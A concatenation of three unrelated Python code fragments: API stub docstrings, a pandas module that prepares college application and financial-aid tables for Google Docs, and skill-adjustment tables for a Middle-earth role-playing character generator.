def commandArgumentMTime(*args, **kwargs):
"""
commandArgumentMTime(argIndex) -> MTime
Returns the specified command argument as an MTime.
"""
pass
def commandArgumentString(*args, **kwargs):
"""
commandArgumentString(argIndex) -> unicode string
Returns the specified command argument as a string.
"""
pass
def flagArgumentBool(*args, **kwargs):
"""
flagArgumentBool(flagName, argIndex) -> bool
Returns the specified argument of the specified single-use flag as
a bool.
"""
pass
def flagArgumentDouble(*args, **kwargs):
"""
flagArgumentDouble(flagName, argIndex) -> float
Alias for flagArgumentFloat().
"""
pass
def flagArgumentFloat(*args, **kwargs):
"""
flagArgumentFloat(flagName, argIndex) -> float
Returns the specified argument of the specified single-use flag as
a | |
<reponame>NobleNetworkCharterSchools/award-letters<filename>modules/basedata.py
#!python3
"""
Module for working with raw csv inputs and creating a 'clean' set of tables
to push Google Docs (before adding what's already in those docs
"""
import numpy as np
import pandas as pd
# The following functions are all used to add calculations to the main table
def _get_final_result(x):
"""Apply function for providing a final status of the application"""
result_code, attending, waitlisted, deferred, stage, app_type = x
if result_code == "denied":
return "Denied"
elif result_code in ["accepted", "cond. accept", "summer admit"]:
if attending == "yes":
return "CHOICE!"
else:
return "Accepted!"
elif result_code == "guar. transfer":
return "Guar. Xfer"
elif (waitlisted == 1) | (waitlisted == "1"):
return "Waitlist"
elif (deferred == 1) | (deferred == "1"):
return "Deferred"
elif stage == "pending":
return "Pending"
elif stage in [
"initial materials submitted",
"mid-year submitted",
"final submitted",
]:
return "Submitted"
elif app_type == "interest":
return "Interest"
else:
return "?"
def _make_barrons_translation(x):
"""Apply function for a custom mapping of a text Barron's field to
a number"""
bar_dict = {
"Most Competitive+": 1,
"Most Competitive": 2,
"Highly Competitive": 3,
"Very Competitive": 4,
"Competitive": 5,
"Less Competitive": 6,
"Noncompetitive": 7,
"2 year (Noncompetitive)": 8,
"2 year (Competitive)": 8,
"Not Available": "N/A",
}
if x in bar_dict:
return bar_dict[x]
else:
return "?"
def _get_act_translation(x, lookup_df):
"""Apply function for calculating equivalent SAT for ACT scores.
Lookup table has index of ACT with value of SAT"""
act = x
if np.isreal(act):
if act in lookup_df.index: # it's an ACT value in the table
return lookup_df.loc[act, "SAT"]
return np.nan # default if not in table or not a number
def _get_sat_guess(x):
"""Returns a GPA guess based on regression constants from the
prior year. nan if GPA isn't a number"""
gpa = x
if np.isreal(gpa):
guess = 427.913068576 + 185.298880075 * gpa
return np.round(guess / 10.0) * 10.0
else:
return np.nan
def _pick_sat_for_use(x):
""" Returns the SAT we'll use in practice"""
sat_guess, interim, actual_sat = x
if np.isreal(actual_sat):
return actual_sat
elif np.isreal(interim):
return interim
elif np.isreal(sat_guess):
return sat_guess
else:
return np.nan
def _get_sat_max(x):
"""Returns the max of two values if both are numbers, otherwise
returns the numeric one or nan if neither is numeric"""
sat, act_in_sat = x
if np.isreal(sat):
if np.isreal(act_in_sat):
return max(sat, act_in_sat)
else:
return sat
else:
if np.isreal(act_in_sat):
return act_in_sat
else:
return np.nan
def _get_strategies(x, lookup_df):
"""Apply function for calculating strategies based on gpa and sat using the
lookup table (mirrors Excel equation for looking up strategy"""
gpa, sat = x
sat = sat if np.isreal(sat) else 710
if np.isreal(gpa):
lookup = "{:.1f}:{:.0f}".format(
max(np.floor(gpa * 10) / 10, 1.5), max(sat, 710)
)
return lookup_df["Strategy"].get(lookup, np.nan)
else:
return np.nan
def _safe2int(x):
try:
return int(x + 0)
except BaseException:
return x
def _get_gr_target(x, lookup_strat, goal_type):
"""Apply function to get the target or ideal grad rate for student"""
strat, gpa, efc, race = x
# 2 or 3 strategies are split by being above/below 3.0 GPA line
# First we identify those and then adjust the lookup index accordingly
special_strats = [int(x[0]) for x in lookup_strat.index if x[-1] == "+"]
if np.isreal(gpa) and np.isreal(strat):
# First define the row in the lookup table
strat_str = "{:.0f}".format(strat)
if strat in special_strats:
lookup = strat_str + "+" if gpa >= 3.0 else strat_str + "<"
else:
lookup = strat_str
# Then define the column in the lookup table
if efc == -1:
column = "minus1_" + goal_type
elif race in ["W", "A", "P"]:
column = "W/A_" + goal_type
else:
column = "AA/H_" + goal_type
return lookup_strat[column].get(lookup, np.nan)
else:
return np.nan
def _make_final_gr(x):
"""Apply function to do graduation rates"""
race, sixyrgr, sixyrgraah, comments = x
first_gr = sixyrgraah if race in ["B", "H", "M", "I"] else sixyrgr
if comments == "Posse":
return (first_gr + 0.15) if first_gr < 0.7 else (1.0 - (1.0 - first_gr) / 2)
else:
return first_gr
# Finally, the main function that calls these
def add_strat_and_grs(df, strat_df, target_df, acttosat_df, campus, debug):
"""
Adds Strategy and Target/Ideal grad rate numbers to the roster table
"""
df = df.copy()
if campus != "All":
df = df[df["Campus"] == campus]
df["local_act_in_sat"] = df["ACT"].apply(_get_act_translation, args=(acttosat_df,))
df["local_sat_guess"] = df["GPA"].apply(_get_sat_guess)
df["local_sat_used"] = df[["local_sat_guess", "InterimSAT", "SAT"]].apply(
_pick_sat_for_use, axis=1
)
df["local_sat_max"] = df[["local_sat_used", "local_act_in_sat"]].apply(
_get_sat_max, axis=1
)
df["Stra-tegy"] = df[["GPA", "local_sat_max"]].apply(
_get_strategies, axis=1, args=(strat_df,)
)
df["Target Grad Rate"] = df[["Stra-tegy", "GPA", "EFC", "Race/ Eth"]].apply(
_get_gr_target, axis=1, args=(target_df, "target")
)
df["Ideal Grad Rate"] = df[["Stra-tegy", "GPA", "EFC", "Race/ Eth"]].apply(
_get_gr_target, axis=1, args=(target_df, "ideal")
)
if debug:
print("Total roster length of {}.".format(len(df)))
return df
def make_clean_gdocs(dfs, config, debug):
"""
Creates a set of tables for pushing to Google Docs assuming there
is no existing award data based on the applications and roster files
"""
# Pullout local config settings:
ros_df = dfs["ros"]
app_df = dfs["app"]
college_df = dfs["college"]
award_fields = config["award_fields"]
efc_tab_fields = config["efc_tab_fields"]
include_statuses = config["app_status_to_include"]
award_sort = config["award_sort"]
if debug:
print('Creating "Blank" Google Docs tables from source csvs', flush=True)
# #####################################################
# First do the (simpler) EFC tab, which is just a combination of
# direct columns from the roster plus some blank columns
efc_pull_fields = [field for field in efc_tab_fields if field in ros_df.columns]
# the line below skips the first column because it is assumed to be
# the index
efc_blank_fields = [
field for field in efc_tab_fields[1:] if field not in ros_df.columns
]
efc_df = ros_df[efc_pull_fields]
efc_df = efc_df.reindex(columns=efc_df.columns.tolist() + efc_blank_fields)
# #####################################################
# Now do the more complicated awards tab
current_students = list(efc_df.index)
award_df = app_df[app_df["hs_student_id"].isin(current_students)].copy()
# Do all of the lookups from the roster table:
for dest, source, default in (
("lf", "LastFirst", "StudentMissing"),
("tgr", "Target Grad Rate", np.nan),
("igr", "Ideal Grad Rate", np.nan),
("race", "Race/ Eth", "N/A"),
):
award_df[dest] = award_df["hs_student_id"].apply(
lambda x: ros_df[source].get(x, default)
)
# Now do all lookups from the college table:
for dest, source, default in (
("cname", "INSTNM", "NotAvail"),
("barrons", "SimpleBarrons", "N/A"),
("local", "Living", "Campus"),
("sixyrgr", "Adj6yrGrad_All", np.nan),
("sixyrgraah", "Adj6yrGrad_AA_Hisp", np.nan),
):
award_df[dest] = award_df["NCES"].apply(
lambda x: college_df[source].get(x, default)
)
# Cleanup from college table for missing values
award_df["cname"] = award_df[["cname", "collegename"]].apply(
lambda x: x[1] if x[0] == "NotAvail" else x[0], axis=1
)
award_df["barrons"] = award_df["barrons"].apply(_make_barrons_translation)
award_df["sixyrfinal"] = award_df[
["race", "sixyrgr", "sixyrgraah", "comments"]
].apply(_make_final_gr, axis=1)
# Other interpreted/calculated values:
award_df["final_result"] = award_df[
["result_code", "attending", "waitlisted", "deferred", "stage", "type"]
].apply(_get_final_result, axis=1)
# Calculated or blank columns (we'll push the calculations with AppsScript)
for f in [
"Award Receiv- ed?",
"Tuition & Fees (including insurance if req.)",
"Room & board (if not living at home)",
"College grants & scholarships",
"Government grants (Pell/SEOG/MAP)",
"Net Price (before Loans) <CALCULATED>",
"Student Loans offered (include all non-parent)",
"Out of Pocket Cost (Direct Cost-Grants-Loans) <CALCULATED>",
"Your EFC <DRAWN FROM OTHER TAB>",
"Unmet need <CALCULATED>",
"Work Study (enter for comparison if desired)",
"Award",
]:
award_df[f] = ""
# Still need to double up home colleges for home/away rows
both_rows = award_df[award_df["local"] == "Both"].copy()
# 'Both' rows become 'Home' here and the replicants (above) will be Away
award_df["cname"] = award_df[["cname", "local"]].apply(
lambda x: x[0] + ("" if x[1] == "Campus" else "--At Home"), axis=1
)
award_df["local"] = award_df["local"].apply(lambda x: "Home" if x == "Both" else x)
award_df["Unique"] = 1
# these are the duplicate rows
both_rows["local"] = "Campus"
both_rows["Unique"] = 0
both_rows["cname"] = both_rows["cname"] + "--On Campus"
award_df = pd.concat([award_df, both_rows])
# Keep different statuses based on config file
award_df = award_df[award_df["final_result"].isin(include_statuses)]
# Rename labels to match what will be in the doc
mapper = {
"lf": "Student",
"tgr": "Target Grad Rate",
"igr": "Ideal Grad Rate",
"cname": "College/University",
"barrons": "Selectivity\n"
+ "1=Most+\n"
+ "2=Most\n"
+ "3=Highly\n"
+ "4=Very\n"
+ "5=Competitive\n"
+ "6=Less\n"
+ "7=Non\n"
+ "8=2 year",
"final_result": "Result (from Naviance)",
"sixyrfinal": "6-Year Minority Grad Rate",
"hs_student_id": "SID",
"NCES": "NCESid",
"local": "Home/Away",
}
use_mapper = {key: value for key, value in mapper.items() if value in award_fields}
award_df.rename(columns=use_mapper, inplace=True)
# Final reduce the table to just what's going in the Google Doc
award_df = award_df[award_fields]
# Sort the table based on config file
| |
"DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"PRO":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":1, "DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":1, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"BEO":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":1, "UNA":0,
"WEA":0
}.items())),
"DUL":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":2, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOB":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOE":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":1, "DEB":1, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOG":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":1, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":1,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"ROR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":2, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"EAS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":2, "RID":1, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SOU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":1,
"MIM":0, "OBS":0, "PER":0, "PRS":1, "RAN":1, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items()))
}
#ORDER PACKAGES
barpacks = {"N":"None", "BBAR":"Basic Barbarian", "DRU":"Druadan Tribesman", "SON":"Southron Nomad", "LOS":"Losson Tribesman", "MOU":"Mountain Folk"}
crapacks = {"N":"None", "BCRA":"Basic Craftsman", "GAR":"Gardener", "INN":"Innkeeper", "SMI":"Smith", "MAS":"Stonemason"}
lorpacks = {"N":"None", "BLOR":"Basic Loremaster", "ERI":"Eriadorian Sage", "GOS":"Gondorian Scholar", "MTH":"Minas Tirith Healer", "RIS":"Rivendell Scholar", "WIW":"Wise Woman"}
magpacks = {"N":"None", "BMAG":"Basic Magician", "WIA":"Wizards Apprentice", "SSA":"Student of the Secret Arts", "TRM":"Travelling Magician", "TIM":"Tribal Magician"}
marpacks = {"N":"None", "BMAR":"Basic Mariner", "FIS":"Fisherman", "NAV":"Navy", "RIV":"Riverman", "SHI":"Shipwright"}
minpacks = {"N":"None", "BMIN":"Basic Minstrel", "GOM":"Gondorian Minstrel", "PER":"Performer", "ROB":"Ro<NAME>", "TRC":"Tribal Chanter"}
nobpacks = {"N":"None", "BNOB":"Basic Noble", "GOL":"Gondorian Lord", "ERG":"Eriadorian Gentry", "LOF":"Leader of Folk", "CHF":"Tribal Chieftain"}
rogpacks = {"N":"None", "BROG":"Basic Rogue", "BUR":"Burglar", "OUT":"Outlaw", "LUR":"Lurker", "PIC":"Pickpocket"}
warpacks = {"N":"None", "BWAR":"Basic Warrior", "BOW":"Bowman", "HOR":"Horseman", "SCO":"Scout", "SEN":"Sentinel", "SHR":"Shirriff"}
packs = {"BAR":barpacks, "CRA":crapacks, "LOR":lorpacks, "MAG":magpacks, "MAR":marpacks, "MIN":minpacks, "NOB":nobpacks, "ROG":rogpacks, "WAR":warpacks}
packskilladjs = {
"N":skilltemp,
"BBAR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":3, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":3, "UNA":0,
"WEA":0
}.items())),
"DRU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":3, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":3, "UNA":0,
"WEA":0
}.items())),
"SON":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":2, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"LOS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":2, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"MOU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":3, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"BCRA":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":4, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":1, "STE":0, "STO":1, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"GAR":collections.OrderedDict(sorted({
"ACR":0, "APP":1, "ARM":0, "CLI":0, "CON":0, "CRA":5, "DEB":0, "GAM":2, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":3,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"INN":collections.OrderedDict(sorted({
"ACR":0, "APP":2, "ARM":0, "CLI":0, "CON":0, "CRA":6, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":2,
"MIM":0, "OBS":1, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SMI":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":3, "STE":0, "STO":1, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MAS":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":2, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":1, "STE":0, "STO":3, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"BLOR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":3, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"ERI":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":2, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":3,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"GOS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":3, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":1, "PER":1, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MTH":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":3, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":8,
"MIM":0, "OBS":2, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"RIS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":1, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":2, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"WIW":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":2
}.items())),
"BMAG":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":2, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":1, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"WIA":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":1, "GAM":0, "GUI":0, "HEA":0, "INQ":1, "ING":1, "INP":1, "INM":2, "JUM":0, "LAN":2, "LEG":0, "LOR":4,
"MIM":0, "OBS":1, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SSA":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":2, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":1, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"TRM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":1, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"TIM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":2, "JUM":0, "LAN":1, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"BMAR":collections.OrderedDict(sorted({
"ACR":1, "APP":0, "ARM":2, "CLI":2, "CON":0, "CRA":1, "DEB":0, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":3, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":3, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"FIS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":3, "DEB":0, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
